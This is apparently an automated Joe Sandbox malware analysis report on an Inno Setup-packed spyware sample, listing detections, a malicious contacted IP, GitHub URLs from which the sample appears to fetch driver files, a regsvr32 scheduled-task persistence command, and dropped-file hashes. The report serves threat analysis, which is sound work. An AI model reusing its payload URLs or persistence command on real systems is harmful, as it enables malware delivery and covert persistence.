      C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp3%ReversingLabs
      C:\Users\user\AppData\Local\Temp\is-M0V11.tmp\_isetup\_isdecmp.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\is-M0V11.tmp\_isetup\_setup64.tmp0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\is-M0V11.tmp\_isetup\_shfoldr.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp3%ReversingLabs
      C:\Users\user\AppData\Local\is-JVPOA.tmp3%ReversingLabs
      C:\Users\user\AppData\Local\unins000.exe (copy)3%ReversingLabs
      C:\Users\user\AppData\Roaming\is-J08NI.tmp43%ReversingLabsWin64.Packed.Generic
      C:\Users\user\AppData\Roaming\netapi32_1.drv (copy)43%ReversingLabsWin64.Packed.Generic
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://crl.ver)0%Avira URL Cloudsafe
      https://.VisualC0%Avira URL Cloudsafe
      http://schemas.microsoft.co0%Avira URL Cloudsafe
      http://crl.microsoft.c0%Avira URL Cloudsafe
      http://www.innosetup.com/0%Avira URL Cloudsafe
      http://www.remobjects.com/ps0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      bg.microsoft.map.fastly.net
      199.232.214.172
      truefalse
        high
        NameSourceMaliciousAntivirus DetectionReputation
        http://www.innosetup.com/8n26gvrXUM.exe, 00000000.00000003.881850634.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.exe, 00000000.00000003.881404803.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000001.00000000.883261373.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-JVPOA.tmp.7.dr, 8n26gvrXUM.tmp.6.dr, 8n26gvrXUM.tmp.0.drfalse
        • Avira URL Cloud: safe
        unknown
        http://nuget.org/NuGet.exepowershell.exe, 0000000A.00000002.945864209.000002660148C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.963153072.0000026610078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1095561017.0000029390077000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938149C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1110863403.0000020890077000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.0000020881496000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          https://stackoverflow.com/q/14436606/23354regsvr32.exe, 0000000E.00000002.2137187188.00000000033D8000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000A.00000002.945864209.000002660022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1145750310.00000293F4118000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000A.00000002.945864209.000002660022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dllregsvr32.exe, 0000000E.00000002.2137187188.00000000033D8000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000A.00000002.945864209.000002660022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1145750310.00000293F4118000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exeregsvr32.exe, 0000000E.00000002.2137187188.00000000033D8000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://contoso.com/Licensepowershell.exe, 0000000F.00000002.1026201200.0000020881496000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://contoso.com/Iconpowershell.exe, 0000000F.00000002.1026201200.0000020881496000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://docs.rs/getrandom#nodejs-es-module-supportregsvr32.exe, regsvr32.exe, 0000000E.00000002.2147102625.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp, is-J08NI.tmp.7.drfalse
                            high
                            http://crl.ver)svchost.exe, 00000011.00000002.2138830717.000001C713847000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.com/Pester/Pesterpowershell.exe, 0000000A.00000002.945864209.000002660022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1145750310.00000293F4118000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://g.live.com/odclientsettings/Prod/C:qmgr.db.17.drfalse
                                high
                                http://www.apache.org/licenses/LICENSE-2.0.htmlXzpowershell.exe, 0000000A.00000002.945864209.000002660022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://stackoverflow.com/q/2152978/23354rCannotregsvr32.exe, 0000000E.00000002.2137187188.00000000033D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://stackoverflow.com/q/11564914/23354;regsvr32.exe, 0000000E.00000002.2137187188.00000000033D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exeregsvr32.exe, 0000000E.00000002.2137187188.00000000033D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000A.00000002.945864209.000002660022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://contoso.com/powershell.exe, 0000000F.00000002.1026201200.0000020881496000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://nuget.org/nuget.exepowershell.exe, 0000000A.00000002.945864209.000002660148C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.963153072.0000026610078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1095561017.0000029390077000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938149C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1110863403.0000020890077000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.0000020881496000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://crl.microsoft.cpowershell.exe, 0000000F.00000002.1135113573.00000208F6821000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.quovadis.bm0powershell.exe, 0000000A.00000002.968534001.0000026677F96000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1139170748.00000293F3A50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1588032598.000000001BB8E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2141694370.000000001BB8F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1131585737.00000208F6490000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2139398628.000001C713899000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2139657410.000001C713902000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://github.com/Pester/PesterXzpowershell.exe, 0000000A.00000002.945864209.000002660022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://.VisualCpowershell.exe, 0000000C.00000002.1145750310.00000293F4143000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://aka.ms/pscore68powershell.exe, 0000000A.00000002.945864209.0000026600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.0000029380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.0000020880001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.remobjects.com/ps8n26gvrXUM.exe, 00000000.00000003.881850634.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.exe, 00000000.00000003.881404803.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000001.00000000.883261373.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-JVPOA.tmp.7.dr, 8n26gvrXUM.tmp.6.dr, 8n26gvrXUM.tmp.0.drfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://ocsp.quovadisoffshore.com0powershell.exe, 0000000A.00000002.968534001.0000026677F96000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1139170748.00000293F3A50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1588032598.000000001BB8E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2141694370.000000001BB8F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1131585737.00000208F6490000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2139398628.000001C713899000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2139657410.000001C713902000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000A.00000002.945864209.0000026600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.0000029380001000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2137187188.000000000373B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.0000020880001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://schemas.microsoft.copowershell.exe, 0000000C.00000002.1145750310.00000293F4143000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://pesterbdd.com/images/Pester.pngXzpowershell.exe, 0000000A.00000002.945864209.000002660022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          144.202.34.112
                                                          unknownUnited States
                                                          20473AS-CHOOPAUStrue
                                                          IP
                                                          127.0.0.1
                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1583336
                                                          Start date and time:2025-01-02 14:02:22 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 13m 31s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                          Run name:Suspected VM Detection
                                                          Number of analysed new started processes analysed:26
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:8n26gvrXUM.exe
                                                          Detection:MAL
                                                          Classification:mal100.spyw.evad.winEXE@27/31@0/2
                                                          EGA Information:
                                                          • Successful, ratio: 40%
                                                          HCA Information:
                                                          • Successful, ratio: 67%
                                                          • Number of executed functions: 160
                                                          • Number of non-executed functions: 32
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                          • Excluded IPs from analysis (whitelisted): 199.232.214.172, 23.204.76.112
                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, c.pki.goog, wu-b-net.trafficmanager.net
                                                          • Execution Graph export aborted for target 8n26gvrXUM.tmp, PID 8968 because there are no executed function
                                                          • Execution Graph export aborted for target powershell.exe, PID 7648 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 8472 because it is empty
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                          TimeTypeDescription
                                                          08:08:05API Interceptor42x Sleep call for process: powershell.exe modified
                                                          08:08:32API Interceptor2x Sleep call for process: svchost.exe modified
                                                          08:08:46API Interceptor1071403x Sleep call for process: regsvr32.exe modified
                                                          14:08:12Task SchedulerRun new task: MicrosoftEdgeUpdateTaskMachineUA{5AA590E8-E6D2-49AB-E5B8-6BCEE32CF7C9} path: regsvr32 s>/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv
                                                          No context
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          bg.microsoft.map.fastly.nethttps://gldkzr-lpqw.buzz/script/ut.js?cb%5C=1735764124690Get hashmaliciousUnknownBrowse
                                                          • 199.232.210.172
                                                          5fr5gthkjdg71.exeGet hashmaliciousQuasar, R77 RootKitBrowse
                                                          • 199.232.214.172
                                                          dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                                          • 199.232.210.172
                                                          hcxmivKYfL.exeGet hashmaliciousRedLineBrowse
                                                          • 199.232.210.172
                                                          WN3Y9XR9c7.exeGet hashmaliciousAsyncRATBrowse
                                                          • 199.232.210.172
                                                          test.doc.bin.docGet hashmaliciousUnknownBrowse
                                                          • 199.232.214.172
                                                          test.doc.bin.docGet hashmaliciousUnknownBrowse
                                                          • 199.232.210.172
                                                          ROtw3Hvdow.exeGet hashmaliciousUnknownBrowse
                                                          • 199.232.210.172
                                                          vfrcxq.ps1Get hashmaliciousAveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                                          • 199.232.210.172
                                                          trwsfg.ps1Get hashmaliciousAveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                                          • 199.232.214.172
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          AS-CHOOPAUSSetup.exe.7zGet hashmaliciousUnknownBrowse
                                                          • 207.246.91.177
                                                          Hilix.x86.elfGet hashmaliciousMiraiBrowse
                                                          • 45.63.53.202
                                                          Hilix.mips.elfGet hashmaliciousMiraiBrowse
                                                          • 45.63.53.238
                                                          kJsfHgzi7N.exeGet hashmaliciousXWormBrowse
                                                          • 192.248.185.253
                                                          DF2.exeGet hashmaliciousUnknownBrowse
                                                          • 192.248.182.81
                                                          setup.msiGet hashmaliciousUnknownBrowse
                                                          • 45.77.249.79
                                                          http://parrottalks.infoGet hashmaliciousUnknownBrowse
                                                          • 149.28.124.84
                                                          botx.mips.elfGet hashmaliciousMiraiBrowse
                                                          • 149.253.144.7
                                                          db0fa4b8db0333367e9bda3ab68b8042.x86.elfGet hashmaliciousMirai, GafgytBrowse
                                                          • 78.141.232.165
                                                          No context
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          C:\Users\user\AppData\Local\Temp\is-9HU94.tmp\_isetup\_isdecmp.dll1944b321.msiGet hashmaliciousUnknownBrowse
                                                            Xzm9fAfKhB.exeGet hashmaliciousSocks5SystemzBrowse
                                                              L9rm7AX4mp.exeGet hashmaliciousSocks5SystemzBrowse
                                                                AX3-GUI-45.exeGet hashmaliciousUnknownBrowse
                                                                  file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    fe61hqe0Dt.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                        file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, Socks5SystemzBrowse
                                                                          AX3-GUI-45.exeGet hashmaliciousUnknownBrowse
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):1310720
                                                                            Entropy (8bit):0.13580266959888063
                                                                            Encrypted:false
                                                                            SSDEEP:384:mJHL7HbahIfcjcidIiBysHciXBs78MmhRht43mKdyrf6YM5u:mJP74rzc8Myr43mNrf6YM5u
                                                                            MD5:FF6945C7EDF111473B667FD6780AD9A7
                                                                            SHA1:01A19DB9E47D3999B30AE6BECA3CBA8E0D574131
                                                                            SHA-256:67633B93D28A43E5C5DD3791C514F73AC1AE75D72B2DD21B703F07C9288DE8C5
                                                                            SHA-512:A13F9AA21D0CD07B9006DD8A3F6455F6A930703350AE06161846E3160144796DC4BAECDF2CE55869049D5A3F10B6DFF8CBF00ED371C11B3F9CD0CA205327F818
                                                                            Malicious:false
                                                                            Preview:...........@..@.3...{g..*...yo.........<.....).*9...y..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................;..........v[.2}c}c.#.........`h.d...............h.<.....6.:......p..*9...y..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb0a00caf, page size 16384, DirtyShutdown, Windows version 10.0
                                                                            Category:dropped
                                                                            Size (bytes):1048576
                                                                            Entropy (8bit):0.8697548924881291
                                                                            Encrypted:false
                                                                            SSDEEP:1536:zSB2qSB2gSjlK/LfDalKohVF8/bGLBSBLil2d/3Cr5DHzk/3A5v7GoCnLKxKHKrx:zapaQK0yfOD8F31Xw
                                                                            MD5:C1A9B25B20545C205EFCF61DDC8C244D
                                                                            SHA1:6E4884D6CD0A47D677B4A587F4556CBDB81F9FC8
                                                                            SHA-256:571E2286FA1FF839B934C0C75429555A00BBC3B20B1A0186A34E5B97FB5AF76B
                                                                            SHA-512:88D746672A9E03169A603574A248868A15725AFEE01E79D3F8B1C657A728C296E432500DA084C291B709EB5BACD4C6A0D755E4AD65568852B514B0D0D1E93FEE
                                                                            Malicious:false
                                                                            Preview:....... ................p..*9...y........................0..........|). ....}k.h.2...........................).*9...y..........................................................................................................bJ......n....@...................................................................................................... ........3...{g......................................................................................................................................................................................................................................).u ....}.L................GlN. ....}...........................#......h.2.....................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):16384
                                                                            Entropy (8bit):0.0824452885110496
                                                                            Encrypted:false
                                                                            SSDEEP:3:Et/sB6kYtq1Bj4i4uRFE5/ll/Ygvlllallo0lJlbxvws:MAPYtMj3LRi5/llDlAL
                                                                            MD5:5868C568992AF525B70C7404ACFA45D0
                                                                            SHA1:2415637D8F30A2E2F305E75DFA7319768F31D5F2
                                                                            SHA-256:50B7A17D8D777B89CBF388BFBDC690A438ED025BD0D9F8FC910C288E5A4FF53A
                                                                            SHA-512:A4BE8EFB105474F1B2C99326C2D788F2E7D04E27031DB3FAB0A38CD7B6A1859C23F60CF5E55484263B91D378AD0E11218D42C234473E65AC27FB2F531702B530
                                                                            Malicious:false
                                                                            Preview:r..g....................................*9...y.. ....}.......|)..............|)......|)..C.t.....|)O................GlN. ....}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\System32\regsvr32.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):328
                                                                            Entropy (8bit):3.534822227527675
                                                                            Encrypted:false
                                                                            SSDEEP:6:kKN8a8UzEsTwD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:yabzKImsLNkPlE99SNxAhUe/3
                                                                            MD5:DBBA4C8FD11CEFC31193623F9B2E3437
                                                                            SHA1:90CD90A1A58FEE504A90577FBF62B9FCFCE1094C
                                                                            SHA-256:1EE76E4211493483B1F3DB14BC1EACCC26F98D5224AFF81A7636F7D0F6AECBBD
                                                                            SHA-512:D8AC6017E9D148A2C0B2158D48465C5683DADE048C8BFDEE513A21A426C090ED94D53BC17F254FB6E13ED070B46F89FDF8D3A160D51685B67127F1E1D288E254
                                                                            Malicious:false
                                                                            Preview:p...... ........R..t.]..(...............................................V..2^... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:modified
                                                                            Size (bytes):64
                                                                            Entropy (8bit):0.34726597513537405
                                                                            Encrypted:false
                                                                            SSDEEP:3:Nlll:Nll
                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                            Malicious:false
                                                                            Preview:@...e...........................................................
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
